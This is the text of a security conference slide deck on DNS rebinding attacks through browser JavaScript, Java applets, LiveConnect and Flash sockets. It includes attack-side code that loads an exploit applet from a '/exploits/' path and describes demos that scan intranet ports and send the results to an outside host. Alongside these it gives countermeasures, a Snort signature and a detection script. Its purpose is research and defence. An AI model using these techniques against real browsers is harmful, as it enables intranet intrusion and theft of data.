DNS Rebinding and Socket API - PowerPoint PPT Presentation

1
DNS Rebinding and Socket API
Kanatoko erz.net
http://www.jumperz.net/
2
DNS Rebinding Overview (1)
  • One of the attack vectors
  • Not a bug in a particular piece of software
  • All kinds of operating systems may be affected
    • Windows, Linux, Mac OS X
  • There are no patches
  • Occurs in the relationship between web servers, DNS
    servers and proxy servers
  • Real threat
  • Maybe your system is vulnerable

3
DNS Rebinding Overview (2)
  • Eve controls the web browser of Alice
    and makes it do something
    • Stealing information
    • Making Alice attack others
  • Not a direct attack against the servers
  • Not an attack against the DNS servers

4
How is the attack deployed?
  • Deployed when Alice visits Eve's trap page
  • Same as XSS, CSRF
  • Without Alice noticing
  • Social engineering using e-mails, BBS,
    comments on blogs
  • It is difficult to find out whether a page is a
    trap or not
  • Sometimes hacked web sites (of famous
    companies, for example) are used to deploy the attack

5
Technologies used in DNS Rebinding
  • JavaScript
  • Java
  • FLASH
  • Malicious code starts running in Alice's
    browser
  • But there are security constraints
  • For example, it cannot read from or write to
    local files
  • Each of these technologies has a network access
    function

6
When Alice visits Eve's page (1)
  • Eve's malicious code starts running and accesses
    the network
  • JavaScript
    • Gets resources using XMLHttpRequest, SCRIPT
      tag, IMG tag (HTTP)
  • FLASH
    • URLLoader (HTTP)
    • Socket (TCP)
  • Java
    • URLConnection (HTTP)
    • Socket (TCP)
    • DatagramSocket (UDP)

7
When Alice visits Eve's page (2)
  • Of course there are security constraints on the
    network access functions
  • Can access only the origin host on which the Java
    applets (.class, .zip, .jar), FLASH SWF files or web
    pages are located
  • Known as the Same Origin Policy

8
DNS Rebinding attack vector (1)
  • Eve owns the top-level domain eve.tld
  • So Eve can control the DNS server of eve.tld
  • Eve runs a web server at 218.45.25.5 and
    places the malicious code there
  • Eve binds 218.45.25.5 as the address of the
    hostname www.eve.tld. Eve sets a very short value
    (for example, 8 seconds) as the TTL of the
    DNS record
  • Alice tries to access Eve's trap page
    located at www.eve.tld
  • The first name resolution is done by Alice and
    218.45.25.5 is returned by Eve's DNS
    server
  • Alice's browser loads Eve's trap page
  • Soon the TTL expires
  • At the same time, Eve changes the configuration
    of the DNS server and binds 127.0.0.1 as the
    address of the hostname www.eve.tld

9
DNS Rebinding attack vector (2)
  • Eve's malicious code in Alice's browser
    tries to access www.eve.tld
  • The second name resolution is done by Alice. This
    time 127.0.0.1 is returned by Eve's DNS
    server
  • The code accesses 127.0.0.1
  • Though 127.0.0.1 is not Eve's host, the code
    is allowed to access 127.0.0.1 because the
    hostname is www.eve.tld (same origin)
  • As the example above shows, DNS Rebinding enables
    Eve to access addresses like 127.0.0.1,
    which of course should not be allowed

10
What is DNS Pinning?
  • Only FLASH is vulnerable to the DNS Rebinding
    attack vector explained on the previous page
  • The other two technologies (JavaScript and Java)
    cache the DNS information in their own ways
  • The TTL does not expire. This behavior violates the
    DNS protocol
  • It is called DNS Pinning
  • Sun Microsystems implements DNS Pinning in Java
    as a countermeasure to DNS Rebinding (or DNS
    Spoofing)
  • On the other hand, the browser vendors
    (Microsoft, Mozilla.org and Opera) do not seem
    to be so conscious of DNS Rebinding
  • Eve needs to make Alice discard the cached DNS
    information to execute DNS Rebinding

11
What is Anti-DNS Pinning? (1)
  • Makes Alice discard the pinned DNS information
  • Can be applied only to JavaScript
    • FLASH does not pin DNS at all
    • Java never discards the pinned DNS information.
      Java is immune to Anti-DNS Pinning
  • Martin Johns notified the security community of
    this issue in Aug 2006
  • http://shampoo.antville.org/stories/1451301/

12
What is Anti-DNS Pinning? (2)
  • If an access to the server fails after an
    appropriate period has elapsed, the browser
    discards the pinned DNS information and executes
    a second name resolution
    • Change the firewall rule
    • Shut down the web server
    • Make Alice access a closed port
      (for example http://example.com:81/)
  • Anti-DNS Pinning makes it possible for Eve to force
    Alice to execute a second name resolution. As a
    result, Eve can launch DNS Rebinding
  • Anti-DNS Pinning is a step used in DNS Rebinding
    (against JavaScript)

13
DNS Rebinding against JavaScript
  • XMLHttpRequest is mainly used
  • Gets information from web servers that Eve
    cannot access without DNS Rebinding, and sends it
    to Eve's host
  • The targets are only web servers because HTTP is
    used for the communication
  • It is not Cross Domain but Cross Address, so
    the HTTP requests do not contain the Cookies and
    Authorization headers of the target web page
    • For this reason it is not used for CSRF
    • For the same reason it means almost nothing to
      force Alice to get information from the Internet,
      so the Intranet is the main target
    • There are some exceptions. If address-based
      authentication exists (for example the countermeasure
      for the Universal PDF XSS issue), Eve may use
      DNS Rebinding to get information via Alice's
      browser
  • The stolen information is sent to another of Eve's
    hosts. This is quite easy for Eve because the
    Same Origin Policy does not restrict sending data
    with JavaScript

14
Demo: DNS Rebinding on JavaScript
  • http://www.jumperz.net/index.php?i=2&a=1&b=7
  • Gets information from the Intranet and sends it to
    www.jumperz.net
  • I was skeptical about whether DNS Rebinding was a
    real threat when I read Martin's article for
    the first time
  • It took me 20 hours to make this demo work
    stably
  • A web application (JSP), a DNS server (djbdns) and
    JavaScript in the browser are used
  • Uses the closed-port method to launch Anti-DNS
    Pinning
  • Special thanks to Kawa from Team Tidori

15
JavaScript on each browser
  • On Firefox, the code needs to wait for about 2
    minutes to launch Anti-DNS Pinning
  • On IE6 and Opera, the code only needs to wait for
    the TTL value (a few seconds)
  • IE7: not checked yet

16
Countermeasures for DNS Rebinding on JavaScript
  • Require authentication for HTTP accesses
    • Basic authentication is enough
  • Disabling JavaScript is perfect
  • It is not a serious threat because easy and good
    countermeasures exist
  • Of course the default usernames/passwords (of
    ADSL routers, for example) need to be changed

17
DNS Rebinding on FLASH and Java (1)
  • Socket APIs are available
  • Eve's code can implement any TCP-based
    protocol
  • It is far more dangerous than DNS Rebinding on
    JavaScript
    • To any host on the Internet or the Intranet
    • With any TCP-based protocol
    • From Alice's browser
  • Portscan
  • SPAM e-mails
  • Exploiting known vulnerabilities
  • File sharing networks
  • DoS attacks
  • Exploiting address-based authentication

18
DNS Rebinding on FLASH and Java (2)
  • Eve can use Alice's browser as a TCP (or UDP)
    proxy, because Eve's malicious code can send
    and receive data at any time through another host
    such as www2.eve.tld, even in a DNS-rebound
    situation
  • Alice's system (or network) could be both a
    victim and an assailant

19
DNS Rebinding on Java (1)
  • Sun's Java Virtual Machine
  • The code runs under a security restriction called
    the Sandbox
  • The host that a Java applet is allowed to communicate
    with over the network is the origin of the
    applet, not the origin of the web page
  • The Socket class (TCP) and the DatagramSocket
    class (UDP) are available
  • Binary data can be sent and received
  • Caches the DNS record until the termination of
    the process (forever). It is a very strong DNS
    Pinning
  • It clearly violates the DNS protocol. This causes
    trouble when you implement server
    applications such as an SMTP server in Java
  • The JVM parameter networkaddress.cache.ttl
    lets you control this behavior. But even
    in this case the TTL value of the DNS record is
    ignored
  • The networkaddress.cache.ttl parameter cannot
    be set from a Java applet

20
DNS Rebinding on Java (2)
  • There was a related issue
  • http://www.cs.princeton.edu/sip/news/sun-02-22-96.html
  • There is no configuration such as "Disable sockets"
    for Java applets
  • We cannot remove the Socket class from Java
    because it is also used in the download process
    of the applet
  • Java downloads the applet by itself. It does not
    rely on the browser
  • So the browser's cache is not used when the
    applet is downloaded by Java
  • Java does the name resolution for the download
  • The point is that Java does the name resolution
    BEFORE the applet has been downloaded
  • And the result of the name resolution will be
    cached forever

21
DNS Rebinding on Java (3)
  • If Eve's DNS server returns the fake IP
    address as the result of Alice's name
    resolution, the Java applet will not be
    downloaded and the attack will fail
  • If Eve's DNS server returns the correct IP
    address as the result of Alice's name
    resolution, the Java applet will be downloaded
    properly. But Eve cannot rebind the IP address
    because Alice's Java caches the result of the
    first name resolution forever. As a result the
    attack will fail
  • In both cases the attack will fail
  • Only users behind proxy servers are
    vulnerable
  • Business users in a corporate network
    with an application proxy gateway are more vulnerable
    than home users with NAT

22
DNS Rebinding on Java (4)
  • Make the proxy server cache the Java applet
    before Java is activated

//make the proxy cache the applet
var foo = new Image();
foo.src = "http://12345.jumperz.net/exploits/MTCPCApplet.class";
//wait for the TTL to expire
setTimeout( 'f1()', 1000 * 12 );
//add the applet tag to the page
function f1()
{
  var base = document.getElementById( "base" );
  //the applet tag's remaining attributes were lost in extraction;
  //code="MTCPCApplet.class" is assumed from the file requested above
  var str = '<applet codebase="http://12345.jumperz.net/exploits/" '
          + 'code="MTCPCApplet.class">'
          + '</applet>';
  base.innerHTML = str;
}
23
DNS Rebinding on Java (5)
  • The download of the Java applet is done by the
    proxy server, even though Java does a name resolution
    and a spoofed IP address is returned. The proxy
    server's cached copy of the Java applet is
    returned to Alice's Java, and Eve's
    malicious code starts running successfully

- The request of the browser
GET /exploits/MTCPCApplet.class HTTP/1.0
Accept: */*
Referer: http://1190066223254.jumperz.net/exploits/ap3.jsp?address=127.0.0.1
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)
Host: 1190066223254.jumperz.net
Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
Connection: Keep-Alive

- The request of the Java applet
GET /exploits/MTCPCApplet.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 2000 5.0) Java/1.6.0_02
Host: 1190066223254.jumperz.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
Connection: keep-alive
24
Demo: DNS Rebinding on Java
  • http://www.jumperz.net/index.php?i=2&a=1&b=10
  • Scans some ports, retrieves the banner from the
    server, and sends the result to www.jumperz.net
  • Works on IE, Firefox and Opera
  • Works only for users behind a proxy

25
Countermeasures for DNS Rebinding on Java (1)
  • Disabling Java
  • Restrict the ports that may be connected to,
    using personal firewalls (for example only 80
    and 443)
  • Require authentication for every protocol used on
    the Intranet
  • Patch known vulnerabilities
  • Use a firewall to find and stop outgoing
    attacks (for example UDP 53 DoS)
  • It is not easy to find malicious Java code at
    the gateway or with IDS or IPS because the Java applet
    class file could be zipped into .zip and .jar
    files

26
Countermeasures for DNS Rebinding on Java (2)
  • Set up a JRE only for Java applets and patch
    the SecurityManager class

public void checkConnect(String host, int port) {
    if (host == null) {
        throw new NullPointerException("host can't be null");
    }
    // The patch: the requested host is replaced by 127.0.0.2 before the
    // permission check. The applet sandbox only grants SocketPermission for
    // the applet's own origin host, so every applet-initiated resolve or
    // connect fails here with a SecurityException, whatever host was asked for.
    host = "127.0.0.2";
    if (!host.startsWith("[") && host.indexOf(':') != -1) {
        host = "[" + host + "]";
    }
    if (port == -1) {
        checkPermission(new SocketPermission(host,
            SecurityConstants.SOCKET_RESOLVE_ACTION));
    } else {
        checkPermission(new SocketPermission(host + ":" + port,
            SecurityConstants.SOCKET_CONNECT_ACTION));
    }
}

27
DNS Rebinding on LiveConnect
  • Works only if both Java and JavaScript are
    enabled
  • One can write Java code inside JavaScript code
    • var s = new java.net.Socket( "www.jumperz.net",
      25 )
  • It is a part of the LiveConnect technology
  • Not supported on IE
  • Eve can send the malicious Java code to Alice
    before Java is activated
  • Users NOT behind a proxy are also vulnerable
  • The LiveConnect implementation of Opera
    seems to have some bugs
  • Firefox is the most dangerous browser

28
Demo: DNS Rebinding on LiveConnect
  • http://www.jumperz.net/index.php?i=2&a=1&b=9
  • A collaboration of Martin Johns and me
  • http://shampoo.antville.org/stories/1566124/
  • Scans some ports, retrieves the banner from the
    server, and sends the result to www.jumperz.net
  • Works on Firefox and Opera

29
Countermeasures for DNS Rebinding on LiveConnect
  • The same as those for Java

30
DNS Rebinding on FLASH (1)
  • The Socket class is available from ActionScript
    3.0
  • Can communicate with a server using a TCP-layer
    protocol
  • Binary data can be sent and received
  • Works on Flash Player 9.0 or later
  • The host that FLASH is allowed to communicate with
    over the network is the origin of the FLASH
    .swf file, not the origin of the web page
  • FLASH does not implement DNS Pinning at all
  • The DNS information is discarded after the
    TTL has elapsed
  • DNS Rebinding on FLASH is very easy
  • It is a threat that FLASH has added the Socket
    class, because FLASH is one of the most widely
    used plugins. Many users enable FLASH in their
    browsers
  • There is no configuration such as "Disable sockets"
    for FLASH

31
DNS Rebinding on FLASH (2)
  • An example code of the Socket class

import flash.events.Event;
import flash.net.Socket;

private var sock1:Socket;

private function test1():void
{
    // assign the field (a local "var sock1" here would shadow it
    // and leave the field null when onConnected runs)
    sock1 = new Socket();
    sock1.addEventListener( Event.CONNECT, onConnected );
    sock1.connect( "www.jumperz.net", 80 );
}

private function onConnected( e:Event ):void
{
    sock1.writeMultiByte( "GET / HTTP/1.0\r\n\r\n", "ISO-8859-1" );
    sock1.flush(); // writeMultiByte only buffers; flush() sends the data
}
32
DNS Rebinding on FLASH (3)
  • Can connect only to ports above 1024 by default.
    This is a difference between FLASH and Java
  • Policy-loading is required to connect to ports
    below 1024. This is done using an original
    TCP-based protocol
  • Policy-loading succeeds under NAT
  • Eve could use port 443 for policy-loading
  • Detecting the network traffic of the
    policy-loading with IDS or IPS would have some
    meaning
  • An example signature (Snort)
  • alert tcp $HOME_NET any -> $EXTERNAL_NET any
    (msg:"FLASH Socket policy-file-request";
    flow:to_server,established;
    content:"<policy-file-request/>"; nocase;)

33
DNS Rebinding on FLASH (4)
  • An example code of policy-loading and the traffic

//load policy using port 2
flash.system.Security.loadPolicyFile( "xmlsocket://www.jumperz.net:2" );

from client to server:
<policy-file-request/>

from server to client:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.jumperz.net" to-ports="*" />
</cross-domain-policy>
34
Demo: DNS Rebinding on FLASH
  • http://www.jumperz.net/index.php?i=2&a=1&b=8
  • This demo made the security community aware of the
    existence of the Socket class in FLASH
  • Works on Flash Player 9.0 or later
  • Cannot scan ports below 1024 in a non-NAT network
    because of the FLASH policy-loading mechanism
  • Scans some ports, retrieves the banner from the
    server, and sends the result to www.jumperz.net

35
Countermeasures for DNS Rebinding on FLASH (1)
  • Disabling FLASH
  • The same as those for Java

36
Countermeasures for DNS Rebinding on FLASH (2)
  • Patch the .dll or .ocx files
  • Overwrite the call instruction to the connect
    winsock API
  • Almost no side effects (you can still watch
    YouTube)

(Disassembly screenshots: BEFORE and AFTER the patch)
37
Dynamic DNS and DNS Pinning
  • At some point an IP address is used by Bob's
    web server
  • Alice visits Bob's web site
  • Bob's connection is lost and he reconnects to the
    Internet, and the IP address of Bob's server
    has changed
  • Soon Bob rebinds the new IP address to
    Bob's hostname using some Dynamic DNS system
  • Eve gets Bob's old IP address (bound by the ISP
    with DHCP)
  • If Alice has pinned the DNS information of
    Bob's hostname, Alice's HTTP requests will be
    sent to Eve's web server. Of course they
    should be sent to Bob's web server
  • In this case Eve can get Alice's session id
    from the cookie and can hijack her session
  • This can happen to every web site because every
    service based on DNS is dynamic in the long term
  • It means that DNS Pinning may cause another
    security problem

38
Countermeasures on all 3 technologies
  • Monitoring DNS packets (is there any good system
    for this purpose?)
    • Change of IP address in a short period
    • Especially from a global IP to a private IP
  • It is hard to find DNS Rebinding attacks from the
    TTL values because very short TTL values are
    widely used
  • The plugins for Firefox are useful (NoScript,
    FlashBlock etc.)
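The monitoring idea above (flag a name whose answer changes within a short period, especially from a global to a private address, while ignoring the TTL) worked through on the scenario of slides 8-9, where www.eve.tld is answered with 218.45.25.5 and then rebound to 127.0.0.1. This is an added example, not code from the presentation; the log format and the sample answers are constructed.

```python
import ipaddress

# Constructed sample of resolver answers as a DNS monitor might log them:
# (seconds, client, queried name, answered IP, TTL). The names and
# addresses follow slides 8-9: www.eve.tld is first answered with
# 218.45.25.5, then rebound to 127.0.0.1 after the 8-second TTL expires.
SAMPLE_ANSWERS = [
    (0,   "alice", "www.eve.tld",     "218.45.25.5",   8),
    (2,   "alice", "www.example.com", "93.184.216.34", 3600),
    (11,  "alice", "www.eve.tld",     "127.0.0.1",     8),
    (15,  "alice", "www2.eve.tld",    "218.45.25.6",   8),
    (40,  "alice", "www.eve.tld",     "10.0.0.1",      8),
    (500, "alice", "www.example.com", "93.184.216.35", 3600),
]


def is_internal(ip):
    """True for loopback, RFC 1918, link-local and other non-global addresses."""
    return not ipaddress.ip_address(ip).is_global


def find_rebinds(answers, window=60):
    """Report names whose answer changes within `window` seconds for the same
    client. A change from a global address to an internal one (the pattern of
    slides 8-9) is rated "high"; any other quick change is rated "low".
    The TTL is deliberately ignored, as the slide notes short TTLs are common.
    Returns (name, old_ip, new_ip, seconds_between, severity) tuples."""
    last = {}      # (client, name) -> (timestamp, ip) of the previous answer
    alerts = []
    for ts, client, name, ip, _ttl in answers:
        key = (client, name)
        if key in last:
            prev_ts, prev_ip = last[key]
            if ip != prev_ip and ts - prev_ts <= window:
                severity = "high" if (not is_internal(prev_ip)
                                      and is_internal(ip)) else "low"
                alerts.append((name, prev_ip, ip, ts - prev_ts, severity))
        last[key] = (ts, ip)
    return alerts


if __name__ == "__main__":
    for alert in find_rebinds(SAMPLE_ANSWERS):
        print("%s: %s -> %s after %ds [%s]" % alert)
```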

39
Other things
  • DNS Rebinding is a really complicated problem
    • Web browsers
    • Plugins
    • DNS
    • Proxies
  • Real threat
  • We cannot find attacks if we are not prepared to
    find them
  • Do we need some detection system for DNS
    Rebinding, as a first step?
  • We need more flexible configurations in the
    browsers
    • Disable/Enable Sockets on Java/FLASH
    • "IP address has changed" notification dialogs

40
Thank you!
  • Any questions?